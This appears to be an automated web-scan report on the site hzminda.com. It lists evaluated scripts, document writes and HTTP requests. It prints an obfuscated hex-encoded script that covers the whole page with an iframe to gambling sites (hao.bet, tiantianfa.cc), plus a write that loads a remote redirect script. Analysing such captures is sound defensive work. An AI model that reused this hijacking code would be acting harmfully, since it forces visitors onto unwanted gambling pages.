        if (k.i == 1) {
            var i = -1;
            if (typeof arguments[0] == "number") {
                i = arguments[0]
            }
            if (typeof arguments[0] == "string") {
                z = i = r[arguments[0].toString().toLowerCase()]
            }
            if (i < 0 || i > 3) {
                alert("Parameters wrong set!");
                return false
            }
            if (k.Bound == i) {
                return false
            }
            k.Direction = i;
            if (typeof arguments[0] == "string" || an) {
                z = k.Direction
            }
            k.Play()
        }
    };
    k.OnBound = k.UnBound = k.OnScroll = k.OnPause = function() {};
    k.Play = function() {
        clearTimeout(u);
        u = setTimeout(p, arguments[0])
    };
    k.ReStart = function(i) {
        window.onresize = null;
        setTimeout(function() {
            window.onresize = function() {
                k.ReStart()
            }
        }, 1000);
        k.Reset();
        k.Start()
    };
    k.Reset = k.Destroy = function() {
        k.Stop();
        M.innerHTML = k.n;
        M.setAttribute("fixnum", M[aa] = k.Play = k.ReStart = k.Reset = k.Continue = k.Stop = k.Pause = k.i = l = J = 0);
        k.i = -1
    };
    k.Continue = function() {
        if (k.i == 2 && !arguments[0]) {
            k.i = d > 1 ? 0 : 1;
            x = setInterval(D, k.Timer);
            return false
        }
        if (k.i == 0) {
            clearInterval(x);
            x = setInterval(D, k.Timer)
        }
        if (k.i == 1) {
            k.Play(P)
        }
    };
    k.Stop = function() {
        if (k.i != 2) {
            k.Pause();
            k.i = 2
        }
    };
    k.Pause = k.Terminate = function() {
        clearTimeout(W);
        clearInterval(x);
        clearTimeout(u)
    };
    setTimeout(e, 800)
};
Marquee.prototype.l = function() {
    var i = this,
        f = Marquee,
        h = null,
        j = null,
        k = 0,
        l = 0,
        c = 0,
        e = 0,
        b = i.Direction > 1 ? "scrollLeft" : "scrollTop",
        a = function(m) {
            var m = m || window.event;
            if (i.DelayTime != 0 || (m.which && m.which != 1) || (m.button && m.button != 1) || i.i == 2 || i.i == -1) {
                return false
            }
            if (k == 0) {
                i.i = k = 1;
                i.Pause();
                m.stopPropagation ? m.stopPropagation() : m.cancelBuble = true;
                m.preventDefault ? m.preventDefault() : m.returnValue = false;
                c = i.c[b];
                l = i.Direction > 1 ? window.event ? m.clientX : m.pageX : window.event ? m.clientY : m.pageY;
                h = m.srcElement || m.target;
                j = h.style.cursor;
                h.style.cursor = "move";
                if (f.m) {
                    h.setCapture()
                }
                f.K(document, "mousemove", g);
                f.K(document, "mouseup", d)
            }
        },
        g = function(n) {
            var n = n || window.event;
            e = i.Direction > 1 ? window.event ? n.clientX : n.pageX : window.event ? n.clientY : n.pageY;
            var m = l - e + c;
            if (m <= 0 || m >= i.y) {
                m <= 0 ? i.c[b] += i.y : i.c[b] = i.y - m;
                l = i.Direction > 1 ? window.event ? n.clientX : n.pageX : window.event ? n.clientY : n.pageY;
                c = i.c[b];
                m = l - e + c
            }
            i.c[b] = m
        },
        d = function(m) {
            if (f.m) {
                h.releaseCapture()
            }
            f.L(document, "mousemove", g);
            f.L(document, "mouseup", d);
            k = i.j = 0;
            h.style.cursor = j;
            i.Continue()
        };
    if (!i.I) {
        f.K(i.c, "mousedown", a)
    }
    i.c.onmouseover = function() {
        if ((i.i == 0 && i.DelayTime > 0) || i.i == 2 || i.i == -1) {
            return false
        }
        i.j = 1;
        i.Pause()
    };
    i.c.onmouseout = function() {
        if (i.j) {
            i.j = 0;
            i.Continue()
        }
    }
};
                                    

#2 JavaScript::Eval (size: 5772, repeated: 1) - SHA256: 6e6e56a5df85560392a5db88a26e214c8d7cdf1d1b1c3709fd21905bb09c25c9

                                        var _$ = ["\x30", "\x66\x6c\x6f\x6f\x72", "\x72\x61\x6e\x64\x6f\x6d", "\x6c\x65\x6e\x67\x74\x68", "\x69\x6e\x64\x65\x78\x4f\x66", "\x77\x38\x38", "\u4f18\u5fb7", "\x57\x38\x38", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\u65b0\u535a", "\x4e\x42\x38\x38", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\u4e50\u864e", "\x6c\x65\x68\x75", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\u592a\u9633\u57ce", "\u7533\u535a", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\u5343\u4ebf", "\x71\x79", "\u5343\u4ebf\u56fd\u9645", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\x62\x65\x74\x77\x61\x79", "\u5fc5\u5a01", "\u5fc5\u5a01\u5a31\u4e50", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\x38\x38", "\u5fc5\u53d1", "\x38\x38\u5fc5\u53d1", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\x62\x65\x74\x77\x61\x79", "\u4e9a\u6d32\u57ce", "\x79\x7a\x63", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\u9f50\u4e50", "\u5176\u4e50", "\x71\x69\x6c\x65", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\x6c\x6f\x6e\x67\x38", "\u9f99\x38", "\u9f99\x38\u5b98\u7f51", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\u68a6\u4e4b\u57ce", "\u68a6\u4e4b\u57ce\u5a31\u4e50", "\x6d\x7a\x63", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\x79\x61\x68\x75", "\u4e9a\u864e", "\u4e9a\u864e\u5a31\u4e50", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\u4f18\u53d1", "\x75\x66\x61\x38", "\u4f18\u53d1\u5a31\u4e50", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\u6b66\u677e", "\u6b66\u677e", "\u6b66\u677e", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\u4f18\u4e50", "\u4f18\u4e50", "\u4f18\u4e50", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\u5fc5\u8d62", "\x62\x77\x69\x6e", "\u5fc5\u8d62\u4e9a\u6d32", '\x68\x74\x74\x70\x3a\x2f\x2f\x68\x61\x6f\x2e\x62\x65\x74', "\u5f69\u7968", "\u5929\u4e0b\u5f69", "\x74\x78\x34\x39\x2e\x63\x63", "\x74\x78\x34\x2e\x63\x63", "\x74\x78\x32\x36\x2e\x63\x63", '\x68\x74\x74\x70\x3a\x2f\x2f\x74\x69\x61\x6e\x74\x69\x61\x6e\x66\x61\x2e\x63\x63\x2f', '\x68\x74\x74\x70\x3a\x2f\x2f\x74\x69\x61\x6e\x74\x69\x61\x6e\x66\x61\x2e\x63\x63\x2f', "\x64\x6f\x63\x75\x6d\x65\x6e\x74", "\x77\x72\x69\x74\x65", '\x3c\x6d\x65\x74\x61\x20\x69\x64\x3d\x22\x76\x69\x65\x77\x70\x6f\x72\x74\x22\x20\x6e\x61\x6d\x65\x3d\x22\x76\x69\x65\x77\x70\x6f\x72\x74\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x3d\x22\x75\x73\x65\x72\x2d\x73\x63\x61\x6c\x61\x62\x6c\x65\x3d\x6e\x6f\x2c\x77\x69\x64\x74\x68\x3d\x64\x65\x76\x69\x63\x65\x2d\x77\x69\x64\x74\x68\x2c\x20\x69\x6e\x69\x74\x69\x61\x6c\x2d\x73\x63\x61\x6c\x65\x3d\x31\x2e\x30\x22\x20\x2f\x3e', '\x3c\x73\x74\x79\x6c\x65\x3e\x68\x74\x6d\x6c\x2c\x62\x6f\x64\x79\x7b\x77\x69\x64\x68\x74\x3a\x31\x30\x30\x25\x3b\x68\x65\x69\x67\x68\x74\x3a\x31\x30\x30\x25\x3b\x6f\x76\x65\x72\x66\x6c\x6f\x77\x3a\x68\x69\x64\x64\x65\x6e\x3b\x7d\x3c\x2f\x73\x74\x79\x6c\x65\x3e', '\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65\x3d\x22\x77\x69\x64\x74\x68\x3a\x31\x30\x30\x25\x3b\x68\x65\x69\x67\x68\x74\x3a\x31\x30\x30\x25\x3b\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x61\x62\x73\x6f\x6c\x75\x74\x65\x3b\x74\x6f\x70\x3a\x30\x3b\x6c\x65\x66\x74\x3a\x30\x3b\x7a\x2d\x69\x6e\x64\x65\x78\x3a\x32\x31\x34\x37\x34\x38\x33\x36\x34\x37\x3b\x22\x3e', '\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x22\x20', '\x22\x20\x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x22\x30\x22\x20\x73\x74\x79\x6c\x65\x3d\x22\x62\x6f\x72\x64\x65\x72\x3a\x30\x3b\x77\x69\x64\x74\x68\x3a\x20\x31\x30\x30\x25\x3b\x20\x74\x65\x78\x74\x2d\x61\x6c\x69\x67\x6e\x3a\x20\x63\x65\x6e\x74\x65\x72\x3b\x20\x62\x6f\x72\x64\x65\x72\x3a\x20\x6d\x65\x64\x69\x75\x6d\x20\x6e\x6f\x6e\x65\x3b\x20\x68\x65\x69\x67\x68\x74\x3a\x31\x30\x30\x25\x3b\x6d\x61\x78\x2d\x68\x65\x69\x67\x68\x74\x3a\x20\x34\x30\x30\x30\x70\x78\x3b\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e', '\x3c\x2f\x64\x69\x76\x3e'];
var a = _$[0];
var b = [0x1, 0x2, 0x3, 0x4, 0x5];
var c = Math[_$[1]](Math[_$[2]]() * b[_$[3]]);
var d = b[c];
if (str1[_$[4]](_$[5]) > -0x1 || str1[_$[4]](_$[6]) > -0x1 || str1[_$[4]](_$[7]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[9]) > -0x1 || str1[_$[4]](_$[10]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[12]) > -0x1 || str1[_$[4]](_$[13]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[15]) > -0x1 || str1[_$[4]](_$[16]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[18]) > -0x1 || str1[_$[4]](_$[19]) > -0x1 || str1[_$[4]](_$[20]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[22]) > -0x1 || str1[_$[4]](_$[23]) > -0x1 || str1[_$[4]](_$[24]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[26]) > -0x1 || str1[_$[4]](_$[27]) > -0x1 || str1[_$[4]](_$[28]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[22]) > -0x1 || str1[_$[4]](_$[31]) > -0x1 || str1[_$[4]](_$[32]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[34]) > -0x1 || str1[_$[4]](_$[35]) > -0x1 || str1[_$[4]](_$[36]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[38]) > -0x1 || str1[_$[4]](_$[39]) > -0x1 || str1[_$[4]](_$[40]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[42]) > -0x1 || str1[_$[4]](_$[43]) > -0x1 || str1[_$[4]](_$[44]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[46]) > -0x1 || str1[_$[4]](_$[47]) > -0x1 || str1[_$[4]](_$[48]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[50]) > -0x1 || str1[_$[4]](_$[51]) > -0x1 || str1[_$[4]](_$[52]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[54]) > -0x1 || str1[_$[4]](_$[54]) > -0x1 || str1[_$[4]](_$[54]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[58]) > -0x1 || str1[_$[4]](_$[58]) > -0x1 || str1[_$[4]](_$[58]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[62]) > -0x1 || str1[_$[4]](_$[63]) > -0x1 || str1[_$[4]](_$[64]) > -0x1) {
    url = _$[8]
} else if (str1[_$[4]](_$[66]) > -0x1 || str1[_$[4]](_$[67]) > -0x1 || str1[_$[4]](_$[68]) > -0x1 || str1[_$[4]](_$[69]) > -0x1 || str1[_$[4]](_$[70]) > -0x1) {
    url = _$[71]
} else {
    url = _$[71]
};
window[_$[73]][_$[74]](_$[75]);
window[_$[73]][_$[74]](_$[76]);
window[_$[73]][_$[74]](_$[77]);
window[_$[73]][_$[74]](_$[78] + url + _$[79]);
window[_$[73]][_$[74]](_$[80]);
                                    

Executed Writes (7)

#1 JavaScript::Write (size: 6, repeated: 1) - SHA256: aac32651b10f567c461b9b4f255d6fb1fa6859b5368d8bd9a51af920ab21cf23

                                        < /div>
                                    

#2 JavaScript::Write (size: 169, repeated: 1) - SHA256: 57550aaaa749fe117aa4fd89d181c630c02cf0bedcffd126380a33ab4bc15232

                                        < a href = "http://www.51.la/?19149991"
target = "_blank"
title = "51.La &#x7F51;&#x7AD9;&#x6D41;&#x91CF;&#x7EDF;&#x8BA1;&#x7CFB;&#x7EDF;" > & # x7F51; & # x7AD9; & # x7EDF; & # x8BA1; < /a>
                                    

#3 JavaScript::Write (size: 87, repeated: 1) - SHA256: 83bb85f2af78f20867aaf309bc56288e88127d3f3b84f855555664ce0a217fe9

                                        < div style = "width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;" >
                                    

#4 JavaScript::Write (size: 165, repeated: 1) - SHA256: dd5120901e1cd6e247af308f3792b3e1098616425a6c5d30d50588533fc9a8b7

                                        < iframe src = " http://tiantianfa.cc/"
frameborder = "0"
style = "border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;" > < /iframe>
                                    

#5 JavaScript::Write (size: 103, repeated: 1) - SHA256: 53db339b0b80637f13dfc63813d7366c899cebe0db896602886ece619163d82e

                                        < meta id = "viewport"
name = "viewport"
content = "user-scalable=no,width=device-width, initial-scale=1.0" / >
                                    

#6 JavaScript::Write (size: 91, repeated: 1) - SHA256: 734fbd17f23285bd55a491e1e4e61913afabbb1821f3d93b4f6cd9949ba01cfb

                                        < script language = "javascript"
src = "http://www.aahuangg.com/js/groupa/jump_zq.js" > < /script>
                                    

#7 JavaScript::Write (size: 65, repeated: 1) - SHA256: bf799ca3806ae0900f010edc5cfaa48f5834d5ba584fb43dba93065158ff557c

                                        < style > html, body {
    widht: 100 % ;height: 100 % ;overflow: hidden;
} < /style>
                                    


HTTP Transactions (84)


Request Response
                                        
                                            GET /read/432089.html HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/html;Charset=utf-8
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:17 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.41
Set-Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8383
Md5:    54ca9f84c0e4797115ba0876f34c02e7
Sha1:   6bf4cda8c74d3ec2187117d38a847e83f59ee454
Sha256: 18f382340ed07e7d2ef1f495213767cc4927165b251ab3e168838f34cd9d274f
                                        
                                            GET /template/paody/css/home.css HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:17 GMT
Last-Modified: Thu, 21 Nov 2013 08:24:30 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"528dc33e-2c50"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   3332
Md5:    d2a54a65ec107733ac152964a647c138
Sha1:   d3332e3484853aa0b25dc8ed94adeaa07254a71c
Sha256: 5f6f1df1384eb063b46603d1691f97d144b3af42ab441dd1f9df2992104eae83
                                        
                                            GET /template/paody/css/style.css HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:18 GMT
Last-Modified: Thu, 21 Nov 2013 08:23:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"528dc312-4594"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4998
Md5:    2c6bf8462a95917c1e703369ae300b64
Sha1:   768d04efd4efee10c4e076cc2c57e9516ac63cf9
Sha256: 47f9bbd2f2d91acb928d9ec18f48ed236953133718d14daa0854abdaa8e7cde6
                                        
                                            GET /template/paody/js/tpl.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:18 GMT
Last-Modified: Sun, 24 Nov 2013 11:48:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"5291e776-4599"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8396
Md5:    14da4922135156996f7878d483168191
Sha1:   e4905112d9628080b26de935976b0a68ebb01fa2
Sha256: 679a273f5b7719fa53377bfc8e1437ab742b53e5e018ecbfe98bf1e82c6edfa0
                                        
                                            GET /js/jq/jquery.lazyload.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:18 GMT
Last-Modified: Thu, 31 Oct 2013 13:29:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"52725b42-8b8"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   744
Md5:    6348619cde36c75bca818e8ac92837ac
Sha1:   f7fe9d84289deda6cd3e182ba5e744c8bc442c4f
Sha256: c02b12be56711ac7752e9f4842b0b1bd3689fe5f357ed2eca198d8f5c0715d9e
                                        
                                            GET /js/jquery-1.11.1.min.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:18 GMT
Content-Length: 146
Last-Modified: Thu, 22 Jun 2017 11:07:23 GMT
Connection: keep-alive
Etag: "594ba4eb-92"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   146
Md5:    9c104e54152530e39d4b004f03368014
Sha1:   5f5bdb315e2e55e1c8f3f0991e846d6c4d82f91f
Sha256: f9e5cdf625cafef3d87aaefb4274ef86ad56b67a1ead994c7ff725b5827b17c4
                                        
                                            GET /template/paody/aaaa/right.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/html;Charset=utf-8
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:18 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.41
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8384
Md5:    0df9afe7622484d7cb2585aea5c6091f
Sha1:   d7ccdf71949ec60d9a1e0ff55a77ed08f09c7503
Sha256: 29bd1ab3401ad5e6732394580a6c400b39d697c3b96ed3f9753c3e4e7c5cbe16
                                        
                                            GET /template/paody/aaaa/index902.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/html;Charset=utf-8
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:19 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.41
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8384
Md5:    6b02ed434df2c83be06e18d72c1798d4
Sha1:   5ea93fe92c72f6180dfa513f1d2f08d00b5bf35e
Sha256: 39ae16b45625a9c8bd76531420d1f79662b49f9a3eb6ed8d9cc5573344eb40a2
                                        
                                            GET /template/paody/aaaa/index903.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/html;Charset=utf-8
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:19 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.41
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8384
Md5:    4b280e2cf82919c47f39594896613c99
Sha1:   4c55bc04dae776e0bfabd2c4e499beaa7c78eb29
Sha256: 4bcb748ceb7e6c5d0df2fa3cbac0e8ce1362ebe7d65a21278937b86e18d5573d
                                        
                                            GET /template/paody/aaaa/all-top.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/html;Charset=utf-8
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:18 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.41
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8384
Md5:    7ec3e9387da1d7d331e8b1d0c7788f36
Sha1:   3cb3c36c68d5000cb65a5d6989b729c776fe197a
Sha256: 7190d71e768ea38d33e8a3ebc8fd5d60fb2aff6cf4d3e7487e1151f65c2bb7b9
                                        
                                            GET /51la.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:19 GMT
Content-Length: 226
Last-Modified: Fri, 23 Jun 2017 01:38:18 GMT
Connection: keep-alive
Etag: "594c710a-e2"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text
Size:   226
Md5:    eda2af80c2e162f01836a1a046a06ef4
Sha1:   f31ddcc719992b6a26d951cd50581a0f545d3999
Sha256: a2bfb010c3cda49b7c1adfd960378bc59519ef585edba7a290facf9052226fa9
                                        
                                            GET /template/paody/aaaa/all-bottom.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/html;Charset=utf-8
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:19 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.41
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8384
Md5:    686eca7f524f7525df94a61fba0941ff
Sha1:   ff2a7c29d1babdcf616016f4e3ee3ba6f506836e
Sha256: 892c4b20f1d3b1741d875df5aaca2f4b90a5e958c482ae570ca1905dbbd877c1
                                        
                                            GET /js/jq/jquery.autocomplete.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
